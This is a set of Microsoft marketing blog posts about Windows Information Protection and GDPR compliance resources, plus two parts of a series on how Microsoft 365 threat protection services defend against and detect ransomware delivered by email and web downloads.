USB flash drives arent the only way data can leave a device. With the app restrictions on accessing work data, you can use WIP to guide users to use Outlook with their corporate email account to send work attachments, and SharePoint or OneDrive for Business to collaborate on work documents. This lets you enhance your overall data protection with Office DLP outbound rules, send email notifications, policy tips, and Office 365 Information Protection for GDPR.

WIP originally shipped in the Windows 10 Anniversary Update (version 1607) and since then, working across Microsoft and with industry, we have made a number of improvements, including:

  1. Support for Office 365 ProPlus, Microsoft Teams, and numerous inbox apps
  2. Simplified management Intune quick setup, WIP Learning for Apps and Network Boundary policy
  3. Manageable as MAM-only (i.e. without full device enrollment)
  4. Improved Recovery (e.g. data access resumes via re-enrollment or re-adding your work account)
  5. AIP integration to enable roaming data on removable storage (e.g. USB thumb drives)
  6. Support from 3rd party apps such as from Citrix (ShareFile), DropBox (desktop sync client), Foxit (Reader, PhantomPDF), and WinZip (WinZip 21, WinZip 22)

With all these features available, WIP is easier than ever to deploy and maintain. Enable this fast, robust, user-friendly security solution to help ensure a more effortlessly secure user experience for your organization.

More information on Windows Information Protection (WIP) found in the following resources:

The final compliance countdown: Are you ready for GDPR?

On May 25, the General Data Protection Regulation (GDPR) will replace the Data Protection Directive as the new standard on data privacy for all organizations that do business with European Union (EU) citizens.[1]When GDPR goes into effect, government agencies and organizations that control, maintain, or process information involving EU citizens will be required to comply with strict new rules regarding the protection of personal customer data.

GDPRs broad scope and holistic interpretation of personal information leaves these agencies and organizations responsible for protecting a wide range of data types, including genetic and biometric data.[2]Leading up to the GDPR rollout, many companies will be reevaluating their current data storage and sharing methods, and determining whether they need to implement new strategies. More than ever, this regulatory transition highlights the importance of prioritizing a strong and comprehensive security stance within your organization.

According to a recent GDPR benchmarking survey, although 89 percent of organizations have (or plan to have) a formal GDPR-readiness program, only 45 percent have completed a readiness assessment.[3]Regardless of where your organization and its security protocols are in terms of GDPR-readiness, Microsoft can help. Microsoft has been working on GDPR-compliant business and engineering solutions for the better part of a year. Because of our extensive experience developing products with security built-in, weve been a leading voice on privacy and GDPR-related issues with EU regulators.

Weve turned these conversations and insights into a free, four-part video series. Watch the Countdown: Preparing for GDPR series today to hear from industry experts and learn more about Microsofts commitment to helping your organization achieve GDPR-compliance.

You can also read more about our point of view on this transition as the first hyper-scale cloud vendor to offer GDPR terms and conditions in the enterprise space.

Finally, you are invited to a free May 25th GDPR live webcast, Safeguarding individual privacy rights with the Microsoft Cloud. Youll learn how you can:

  • Use GDPR fundamentals to assess and manage you compliance risk.
  • Help protect your customers’ data with our built-in, intelligent security capabilities.
  • Meet your own compliance obligations by streamlining their processes.




Categories: Uncategorized Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 3

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Detecting ransomware in the modern workplace

Over the last two weeks, we have shared with you the roots of Microsoft 365 threat protection and how Microsoft 365 threat protect helps protect the modern workplace from ransomware. This week, we discuss how Microsoft 365 threat protection helps detect ransomware in the modern workplace. Detection is critical for any best in class security solution especially when the person does not use Microsoft Edge with the benefits of its web protection. In our web-based scenario, the user can access the website through another browser, download the “software update” and infect their machine with ransomware. Microsoft 365 offers detection capabilities across all threat vectors and figure 1 summarizes the services which help to detect threats.

Ransomware Detection with Microsoft 365
Windows Defender Advanced Threat Protection
Azure Advanced Threat Protection
Microsoft Cloud App Security
Azure Security Center
Office 365 Advanced Threat Protection
Office 365 Threat Intelligence

Figure 1. Microsoft 365 threat protection helps detect threats to the modern workplace

For example, with ransomware downloads from the web, Windows Defender ATPs (WDATP) next-gen antivirus protection does an initial analysis of the file and sends all suspicious files to a detonation chamber. The file verdict is quickly determined. If a malicious verdict is returned, WDATP immediately begins blocking the threat. Todays most sophisticated ransomware is designed to spread laterally across networks increasing its potential impact. Fortunately, WDATP enables security operations specialists to isolate machines from the network, stopping threats from spreading. Also, WDATP provides granular visibility into the device ecosystem so that a compromised device can be easily identified. Built-in threat intelligence is leveraged to help detect the latest threats and provide real-time threat monitoring. As we alluded to, signal sharing via the intelligent security graph is a powerful differentiator of Microsoft 365, enabling threat detection across any threat vector. Once WDATP determines the downloaded files are malicious, it shares this signal with the Intelligent Security Graph enabling our other platforms to become aware of the threat.

The seamless integration, for example, allows admins to pivot directly from the device analysis in WDATP to user profiles in Azure ATP without losing context allowing a detailed investigation of the incident as shown in Figure 2 below.

Figure 2. Signal sharing and event timeline shared between WDATP and Azure ATP

Often, ransomware uses a brute force password method to move laterally through a network which our Azure ATP service is specifically designed to detect. A brute force password attack may attempt multiple logins until a correct password is used to enter an account. This anomalous behavior would be detected by Azure ATP and with signals shared from WDATP, the anomaly would be quickly assigned to the ransomware and blocked from being downloaded onto any part of the network (device, user, etc). Azure ATP enables security operations analysts to investigate the type of intrusions and methods used by attackers to gain privileged access to user identities and provides a clear attack and event timeline. While Azure ATP detects anomalies at the network level, Microsoft Cloud App Security can detect abnormal file and user behavior within native Microsoft cloud apps such as Office 365, as well as third-party cloud applications. To detect ransomware attacks, Microsoft Cloud App Security identifies behavioral patterns that reflect ransomware activity; for example, a high rate of file uploads or file deletion activities, coupled with threat intelligence capabilities, such as the detection of known ransomware extensions. Microsoft Cloud App Security will alert on these abnormalities using anomaly detection policies that provide out-of-the-box user and entity behavioral analytics (UEBA) and machine learning (ML) capabilities, as well as fully customizable activity policies, enabling SecOps to detect these anomalies instantly. Learn more about how Microsoft Cloud App Security and Azure ATP work in tandem to help detect an actual ransomware attack.

Azure Security Center is also connected with WDATP and provides infrastructure level alerts and even provides an investigation path so admins can fully view the threat propagation details. The service includes threat intelligence which maps the threat source and provides the potential objectives of the threat campaign. What happens if an attacker senses that the web-based attack vector is being blocked and pivots to sending the ransomware via email as an attachment download? Microsoft 365 integration is again crucial as WDATP also shares the signal with Office 365 and once our ransomware is identified by WDATP, Office 365 will begin blocking the threat too. With Office 365 ATPs real-time reporting and Office 365 threat intelligence, admins gain full visibility into all users who receive ransomware via email. Both Office ATP and Office threat intelligence services also track threats found in SharePoint Online, OneDrive for Business, and Teams so detection extends to the entire Office 365 suite. With Microsoft 365 threat protection, threats can be easily detected no matter how an attack is launched. Figure 3 shows the new Microsoft 365 Security and Compliance Center which is the hub from where admins can access the information from the different services.

Figure 3. Microsoft 365 Security and Compliance center which connects the Azure, Office 365, and Windows workloads

Next week we conclude our Microsoft 365 threat protection blog series by covering the remediation and education capabilities offered by Microsoft 365 threat protection. We will demonstrate how Microsoft 365 threat protection workloads can help quickly remediate a ransomware attack and also help educate end users on how to behave and react when under attack.

More blog posts from this series:

Categories: Uncategorized Tags:

Securing the modern workplace with Microsoft 365 threat protection – part 2

This post is authored by Debraj Ghosh, Senior Product Marketing Manager, Microsoft 365 Security.

Protecting the modern workplace against Ransomware

Last week, we shared the roots of Microsoft 365 threat protection. This week, we want to share how Microsoft 365 threat protection services work together to help organizations protect themselves. Figure 1 is a graphical representation of the Microsoft advanced threat protection services which secure the attack surface.

Figure 1. Microsoft 365 advanced threat protection services work together to protect the modern workplace from attacks.

We continue with our ransomware scenario. Ransomware restricts data access by encrypting the user’s files or locking computers. Victims are required to pay a ransom to regain access to their machine and/or files. Microsoft closely monitors the threat landscape and our security intelligence provided in figure 2shows ransomware remains a prevalent and lethal threat type. All forms of ransomware can be launched at an organization through email, the device ecosystem, or through the enterprise infrastructure.

Figure 2. Monthly ransomware and ransomware downloader encounters, July 2016 to June 2017.

With so many different attack vectors a point service will be unable to mitigate the variety of potential ransomware attacks. Having services that protect specific parts of the attack surface that can also share signals to alert services protecting other surfaces of the enterprise is the only way to help ensure full and near real-time security. In many ransomware scenarios, users receive an email suggesting a necessary software update which can be done downloading an attachment. The attachment will contain a trojan downloader which can run a ransomware payload once opened. Figure 3 shows the Microsoft 365 threat protection services which can help protect the modern workplace from ransomware attacks.

Ransomware Protection with Microsoft 365
Windows Defender Advanced Threat Protection
Office 365 Advanced Threat Protection
Azure Security Center

Figure 3. Ransomware protection services for M365 threat protection.

All Microsoft 365 threat protection users have email protected with Office 365 ATP which helps stop unknown advanced threats sent via email. Office ATP will detonate all email attachments, determine if the file is malicious, and remove the file before final delivery of the email to a user mailbox. Additionally, Office ATP will assess links at the time of click when in both the body of an email and detonate links embedded in attachments to determine if they point to a malicious website. Since the attack surface is broad often attacks are made directly at devices. As such, several new enhancements helping prevent ransomware are built into the latest version of Windows 10, leveraging machine learning and behavior based technologies which lead the evolution of malware prevention. To directly attack the device, imagine if our attacker creates a website hosting exploit kits containing ransomware. Users visiting the site mistakenly download ransomware directly from the website. In such an event, Microsofts Edge leverages Windows Defender ATPs browser protection capability which determines if a site is malicious and can block access, helping secure the ransomware entry point. Ransomware attacks also target workloads running in the cloud. Azure Security Center helps provide visibility into your cloud infrastructure leveraging machine learning backed up by the Intelligent Security Graph to provide actionable alerts and recommendations on mitigating such threats as shown in figure 4. While none of these services alone can protect the entire modern workplace, together as Microsoft 365 threat protection, organizations can have confidence that Microsoft helps reduce threats from all vectors. Next week, well demonstrate how Microsoft 365 threat protection services help detect ransomware attacks.

Figure 4. The Azure Security Center Dashboard.

More blog posts from this series:

Categories: Uncategorized Tags: